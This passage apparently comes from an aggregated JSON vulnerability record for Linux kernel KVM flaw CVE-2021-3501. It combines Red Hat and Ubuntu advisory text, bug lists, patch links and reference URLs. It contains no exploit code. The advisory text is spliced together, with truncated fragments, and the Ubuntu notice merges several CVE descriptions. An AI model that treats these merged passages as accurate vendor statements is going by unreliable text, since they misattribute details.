metrics from kube-state-metrics which aren\u0027t used\n1955600 - e2e unidling test flakes in CI\n1956565 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry\n1956980 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed. \n1957308 - Customer tags cannot be seen in S3 level when set spec.managementState from Managed-\u003e Removed-\u003e Managed in configs.imageregistry with high ratio\n1957499 - OperatorHub - console accepts any value for \"Infrastructure features\" annotation\n1958416 - openshift-oauth-apiserver apiserver pod crashloopbackoffs\n1958467 - [4.7] Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct\n1958873 - Device Replacemet UI, The status of the disk is \"replacement ready\" before I clicked on \"start replacement\"\n1959546 - [4.7] storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions\n1959737 - Unable to assign nodes for EgressIP even if the egress-assignable label is set\n1960093 - Console not works well against a proxy in front of openshift clusters\n1960111 - Port 8080 of oVirt CSI driver is causing collisions with other services\n1960542 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960544 - Overly generic CSS rules for dd and dt elements breaks styling elsewhere in console\n1960562 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960589 - manifests: extra \"spec.version\" in console quickstarts makes CVO hotloop\n1960645 - [Backport 4.7] Add virt_platform metric to the collected metrics\n1960686 - GlobalConfigPage is constantly requesting resources\n1961069 - CMO end-to-end tests work only on AWS\n1961367 - Conformance tests for OpenStack require the Cinder client that is not included in the \"tests\" image\n1961518 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1961557 - [release-4.7] respect the shutdown-delay-duration from OpenShiftAPIServerConfig\n1961719 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop\n1961887 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns\n1962314 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true\n1962493 - Kebab menu of taskrun contains Edit options which should not be present\n1962637 - Nodes tainted after configuring additional host iface\n1962819 - OCP v4.7 installation with OVN-Kubernetes fails with error \"egress bandwidth restriction -1 is not equals\"\n1962949 - e2e-metal-ipi and related jobs fail to bootstrap due to multipe VIP\u0027s\n1963141 - packageserver clusteroperator Available condition set to false on any Deployment spec change\n1963243 - HAproxy pod logs showing error \"another server named \u0027pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080\u0027 was already defined at line 326, please use distinct names\"\n1964322 - UI, The status of \"Used Capacity Breakdown [Pods]\" is \"Not available\"\n1964568 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation\n1965075 - [4.7z] After upgrade from 4.5.16 to 4.6.17, customer\u0027s application is seeing re-transmits\n1965932 - [oauth-server] bump k8s.io/apiserver to 1.20.3\n1966358 - Build failure on s390x\n1966798 - [tests] Release 4.7 broken due to the usage of wrong OCS version\n1966810 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration\n1967328 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud\n1967966 - prometheus-k8s pods can\u0027t be scheduled due to volume node affinity conflict\n1967972 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews\n1970322 - [OVN]EgressFirewall doesn\u0027t work well as expected\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat Virtualization Host security update [ovirt-4.4.6]\nAdvisory ID: RHSA-2021:2522-01\nProduct: Red Hat Virtualization\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:2522\nIssue date: 2021-06-22\nCVE Names: CVE-2020-24489 CVE-2021-3501 CVE-2021-3560 \n CVE-2021-27219 \n=====================================================================\n\n1. Summary:\n\nAn update for imgbased, redhat-release-virtualization-host, and\nredhat-virtualization-host is now available for Red Hat Virtualization 4\nfor Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64\nRed Hat Virtualization 4 Hypervisor for RHEL 8 - x86_64\n\n3. Description:\n\nThe redhat-virtualization-host packages provide the Red Hat Virtualization\nHost. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are\ninstalled using a special build of Red Hat Enterprise Linux with only the\npackages required to host virtual machines. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe redhat-virtualization-host packages provide the Red Hat Virtualization\nHost. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are\ninstalled using a special build of Red Hat Enterprise Linux with only the\npackages required to host virtual machines. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe ovirt-node-ng packages provide the Red Hat Virtualization Host. These\npackages include redhat-release-virtualization-host, ovirt-node, and\nrhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a\nspecial build of Red Hat Enterprise Linux with only the packages required\nto host virtual machines. RHVH features a Cockpit user interface for\nmonitoring the host\u0027s resources and performing administrative tasks. \n\nSecurity Fix(es):\n\n* glib: integer overflow in g_bytes_new function on 64-bit platforms due to\nan implicit cast from 64 bits to 32 bits (CVE-2021-27219)\n\n* kernel: userspace applications can misuse the KVM API to cause a write of\n16 bytes at an offset up to 32 GB from vcpu-\u003erun (CVE-2021-3501)\n\n* polkit: local privilege escalation using\npolkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\n* hw: vt-d related privilege escalation (CVE-2020-24489)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nBug Fix(es):\n\n* Previously, systemtap dependencies were not included in the RHV-H\nchannel. Therefore, systemtap could not be installed. \nIn this release, the systemtap dependencies have been included in the\nchannel, resolving the issue. (BZ#1903997)\n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/2974891\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1903997 - Provide systemtap dependencies within RHV-H channel\n1929858 - CVE-2021-27219 glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits\n1950136 - CVE-2021-3501 kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu-\u003erun\n1961710 - CVE-2021-3560 polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync()\n1962650 - CVE-2020-24489 hw: vt-d related privilege escalation\n\n6. Package List:\n\nRed Hat Virtualization 4 Hypervisor for RHEL 8:\n\nSource:\nredhat-virtualization-host-4.4.6-20210615.0.el8_4.src.rpm\n\nx86_64:\nredhat-virtualization-host-image-update-4.4.6-20210615.0.el8_4.x86_64.rpm\n\nRHEL 8-based RHEV-H for RHEV 4 (build requirements):\n\nSource:\nredhat-release-virtualization-host-4.4.6-2.el8ev.src.rpm\n\nnoarch:\nredhat-virtualization-host-image-update-placeholder-4.4.6-2.el8ev.noarch.rpm\n\nx86_64:\nredhat-release-virtualization-host-4.4.6-2.el8ev.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-24489\nhttps://access.redhat.com/security/cve/CVE-2021-3501\nhttps://access.redhat.com/security/cve/CVE-2021-3560\nhttps://access.redhat.com/security/cve/CVE-2021-27219\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYNH6EtzjgjWX9erEAQg8rBAApw3Jn/EPQosAw8RDA053A4aCxO2gHC15\nHK1kJ2gSn73kahmvvl3ZAFQW3Wa/OKZRFnbOKZPcJvKeVKnmeHdjmX6V/wNC/bAO\ni2bc69+GYd+mj3+ngKmTyFFVSsgDWCfFv6lwMl74d0dXYauCfMTiMD/K/06zaQ3b\narTdExk9VynIcr19ggOfhGWAe5qX8ZXfPHwRAmDBNZCUjzWm+c+O+gQQiy/wWzMB\n6vbtEqKeXfT1XgxjdQO5xfQ4Fvd8ssKXwOjdymCsEoejplVFmO3reBrl+y95P3p9\nBCKR6/cWKzhaAXfS8jOlZJvxA0TyxK5+HOP8pGWGfxBixXVbaFR4E/+rnA1E04jp\nlGXvby0yq1Q3u4/dYKPn7oai1H7b7TOaCKrmTMy3Nwd5mKiT+CqYk2Va0r2+Cy/2\njH6CeaSKJIBFviUalmc7ZbdPR1zfa1LEujaYp8aCez8pNF0Mopf5ThlCwlZdEdxG\naTK1VPajNj2i8oveRPgNAzIu7tMh5Cibyo92nkfjhV9ube7WLg4fBKbX/ZfCBS9y\nosA4oRWUFbJYnHK6Fbr1X3mIYIq0s2y0MO2QZWj8hvzMT+BcQy5byreU4Y6o8ikl\nhXz6yl7Cu6X7wm32QZNZMWbUwJfksJRBR+dfkhDcGV0/zQpMZpwHDXs06kal9vsY\nDRQj4fNuEQo=\n=bDgd\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.4.z0 source tree\n(BZ#1957489)\n\n4. Description:\n\nThis is a kernel live patch module which is automatically loaded by the RPM\npost-install script to modify the code of a running kernel. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* OVS mistakenly using local IP as tun_dst for VXLAN packets (?)\n(BZ#1944667)\n\n* Selinux: The task calling security_set_bools() deadlocks with itself when\nit later calls selinux_audit_rule_match(). (BZ#1945123)\n\n* [mlx5] tc flower mpls match options does not work (BZ#1952061)\n\n* mlx5: missing patches for ct.rel (BZ#1952062)\n\n* CT HWOL: with OVN/OVS, intermittently, load balancer hairpin TCP packets\nget dropped for seconds in a row (BZ#1952065)\n\n* [Lenovo 8.3 bug] Blackscreen after clicking on \"Settings\" icon from\ntop-right corner. (BZ#1952900)\n\n* RHEL 8.x missing uio upstream fix. (BZ#1952952)\n\n* Turbostat doesn\u0027t show any measured data on AMD Milan (BZ#1952987)\n\n* P620 no sound from front headset jack (BZ#1954545)\n\n* RHEL kernel 8.2 and higher are affected by data corruption bug in raid1\narrays using bitmaps. (BZ#1955188)\n\n* [net/sched] connection failed with DNAT + SNAT by tc action ct\n(BZ#1956458)\n\n4. ==========================================================================\nUbuntu Security Notice USN-4983-1\nJune 03, 2021\n\nlinux-oem-5.10 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-33200)\n\nPiotr Krysiuk and Benedict Schlueter discovered that the eBPF\nimplementation in the Linux kernel performed out of bounds speculation on\npointer arithmetic. A local attacker could use this to expose sensitive\ninformation. (CVE-2021-29155)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly prevent speculative loads in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-3501)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n linux-image-5.10.0-1029-oem 5.10.0-1029.30\n linux-image-oem-20.04 5.10.0.1029.30\n linux-image-oem-20.04b 5.10.0.1029.30\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-3501"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "VULHUB",
"id": "VHN-391161"
},
{
"db": "VULMON",
"id": "CVE-2021-3501"
},
{
"db": "PACKETSTORM",
"id": "163188"
},
{
"db": "PACKETSTORM",
"id": "163149"
},
{
"db": "PACKETSTORM",
"id": "163242"
},
{
"db": "PACKETSTORM",
"id": "162881"
},
{
"db": "PACKETSTORM",
"id": "162882"
},
{
"db": "PACKETSTORM",
"id": "162890"
},
{
"db": "PACKETSTORM",
"id": "162977"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-3501",
"trust": 4.1
},
{
"db": "PACKETSTORM",
"id": "162977",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "163149",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162881",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162936",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.1945",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1919",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1868",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2131",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "162890",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "162882",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "163242",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-391161",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-3501",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163188",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391161"
},
{
"db": "VULMON",
"id": "CVE-2021-3501"
},
{
"db": "PACKETSTORM",
"id": "163188"
},
{
"db": "PACKETSTORM",
"id": "163149"
},
{
"db": "PACKETSTORM",
"id": "163242"
},
{
"db": "PACKETSTORM",
"id": "162881"
},
{
"db": "PACKETSTORM",
"id": "162882"
},
{
"db": "PACKETSTORM",
"id": "162890"
},
{
"db": "PACKETSTORM",
"id": "162977"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "NVD",
"id": "CVE-2021-3501"
}
]
},
"id": "VAR-202105-0904",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-391161"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T22:39:10.303000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Bug\u00a01950136",
"trust": 0.8,
"url": "http://www.kernel.org"
},
{
"title": "Linux kernel Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=150809"
},
{
"title": "Red Hat: CVE-2021-3501",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2021-3501"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-3501 log"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-3501"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
},
{
"problemtype": "Out-of-bounds writing (CWE-787) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391161"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "NVD",
"id": "CVE-2021-3501"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950136"
},
{
"trust": 1.8,
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04c4f2ee3f68c9a4bf1653d15f1a9a435ae33f7a"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3501"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20210618-0008/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-3501"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162977/ubuntu-security-notice-usn-4983-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2131"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1919"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163149/red-hat-security-advisory-2021-2286-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-memory-corruption-via-kvm-35276"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162936/ubuntu-security-notice-usn-4977-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162881/red-hat-security-advisory-2021-2169-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1868"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1945"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3543"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-27219"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27219"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25039"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8286"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15358"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21639"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12364"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28165"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28092"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13776"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25037"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13776"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24977"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10878"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24330"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28935"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28163"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-14502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25034"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8285"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25035"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26116"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26137"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21309"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21640"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29361"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25042"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25042"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25648"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25038"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25041"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8648"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25036"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27170"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25215"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3177"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25692"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3326"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25036"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25035"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-2708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-2433"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8927"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3347"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24332"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3114"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25039"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12364"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25041"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2461"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8284"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25034"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27618"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3121"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2286"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3121"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2287"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24489"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3560"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24489"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3560"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2165"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2168"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29155"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1029.30"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-4983-1"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391161"
},
{
"db": "VULMON",
"id": "CVE-2021-3501"
},
{
"db": "PACKETSTORM",
"id": "163188"
},
{
"db": "PACKETSTORM",
"id": "163149"
},
{
"db": "PACKETSTORM",
"id": "163242"
},
{
"db": "PACKETSTORM",
"id": "162881"
},
{
"db": "PACKETSTORM",
"id": "162882"
},
{
"db": "PACKETSTORM",
"id": "162890"
},
{
"db": "PACKETSTORM",
"id": "162977"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "NVD",
"id": "CVE-2021-3501"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-391161",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-3501",
"ident": null
},
{
